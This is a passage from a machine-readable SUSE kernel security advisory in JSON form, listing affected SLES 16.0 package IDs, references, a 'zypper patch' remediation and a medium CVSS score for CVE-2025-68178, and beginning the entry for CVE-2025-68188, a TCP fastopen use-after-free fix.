"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
